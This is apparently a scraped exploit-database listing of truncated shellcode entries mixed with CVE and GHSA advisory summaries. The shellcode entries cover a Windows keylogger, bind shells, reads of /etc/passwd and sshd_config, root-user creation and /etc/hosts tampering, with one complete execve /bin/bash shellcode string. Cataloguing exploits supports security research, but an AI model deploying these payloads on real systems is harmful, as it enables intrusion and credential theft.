Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (Generator) 864 bytes

/ Title : Windows x64 Remote Keylogger UDP size : 864 bytes Author : Roziul Hasan Khan Shifat Tested On : Windows 10 x64 pro Date : 26-10-2018 Email: email protected / / keyl.obj: file format pe-x86-64 Disassembly of section .text: 0000000000000000 : 0: eb 1d jmp 1f 0000000000000002 : 2: 48 31 d2...

Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes

/ Linux/x86 - execve/bin/cat /etc/ssh/sshdconfig Shellcode 44 Bytes Author: Goutham Madhwaraj Tested on: i686 GNU/Linux Shellcode Length: 44 ShoutOut - BarrierSec gcc -fno-stack-protector -z execstack loader-bind.c -o Disassembly of section .text: 08048080 : 8048080: 31 c0 xor eax,eax 8048082: 50...

Insecure Random

bip39 is vulnerable to insecure random attacks. The vulnerability exists due to the usage of less secure random bytes generator to generate a mnemonic string...

GHSA-45XM-V8GQ-7JQX Excessive memory allocation

In version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit 8192 bytes above which the WebSocket gets an HTTP response with the...

CVE-2018-12541

In version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit 8192 bytes above which the WebSocket gets an HTTP response with the...

CVE-2018-17427

SIMDComp before 0.1.0 allows remote attackers to cause a denial of service heap-based buffer over-read and application crash because it can read and then discard extra bytes...

Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)

Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...

Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)

/ Title: Linux/ARM - Bind 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 92 Bytes Date: 2018-09-26 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara System Information pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux...

Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)

Linux/ARM - Bind 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 92 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Bind 0.0.0.0:4444/TCP Shell /bin/sh + Null-Free Shellcode 92 Bytes Date: 2018-09-26 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara System Informatio...

Stack overflow

An exploitable stack-based buffer overflow vulnerability exists in the retrieval of database fields in the video-core HTTP server of the Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The strcpy call overflows the destination buffer, which has a size of 2000 bytes. An attacker ca...

Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)

/ Title: Linux/x86 - Egghunter + sigaction-based Shellcode 27 bytes Author:Valbrux This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode global start section .text ;zeroing ecx xor ecx,ecx start: ;increment inc ecx ;sigaction syscall number push byte 67 pop ea...

Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)

Linux/x86 - Egghunter 0x50905090 + sigaction Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - Egghunter + sigaction-based Shellcode 27 bytes Author:Valbrux Date: 2018-09-19 This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode...

Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)

/ Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode 54 bytes Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc -o xorencodedshellcode -z execstack -fno-stack-protector xorencodedshellcode.c / / Disassembly of section .text: 08048060 : 804806...

Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)

/ Shellcode Title: Linux/x86 - Read File /etc/passwd MSF Optimized Shellcode 61 bytes Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc -o readfileshellcode -z execstack -fno-stack-protector readfileshellcode.c / / Disassembly of section .text: 08048060 :...

Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)

/ Shellcode Title: Linux/x86 - Add Userr00t/blank Polymorphic Shellcode 103 bytes Date: 2018-09-13 Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc -o polyaddusershellcode -z execstack -fno-stack-protector polyaddusershellcode.c / / Disassembly of section...

Linux/x86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)

/ Title: Linux/86 - File Modification/etc/hosts Polymorphic Shellcode 99 bytes Author: Ray Doyle @doylersec Tested on: Linux/x86 gcc -o polyhostsshellcode -z execstack -fno-stack-protector polyhostsshellcode.c / / Disassembly of section .text: 08048060 : 8048060: 29 c9 sub ecx,ecx 8048062: 51 pus...

Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)

Linux/x86 - Add Root User r00t/blank + Polymorphic Shellcode 103 bytes. Shellcode exploit for Linuxx86 platform / Shellcode Title: Linux/x86 - Add Userr00t/blank Polymorphic Shellcode 103 bytes Date: 2018-09-13 Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc...

Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)

Linux/x86 - Read File /etc/passwd + MSF Optimized Shellcode 61 bytes. Shellcode exploit for Linuxx86 platform / Shellcode Title: Linux/x86 - Read File /etc/passwd MSF Optimized Shellcode 61 bytes Date: 2018-09-13 Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 g...

GHSA-H6H9-PPHV-M266 Topydo Improper Input Validation vulnerability

topydo contains a CWE-20: Improper Input Validation vulnerability in ListFormatParser::parse, file topydo/lib/ListFormat.py line 292 as of d4f843dac71308b2f29a7c2cdc76f055c3841523 that can result in Injection of arbitrary bytes to the terminal, including terminal escape code sequences. This attac...

CVE-2018-3875

An exploitable buffer overflow vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250-Firmware version 0.20.17. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the...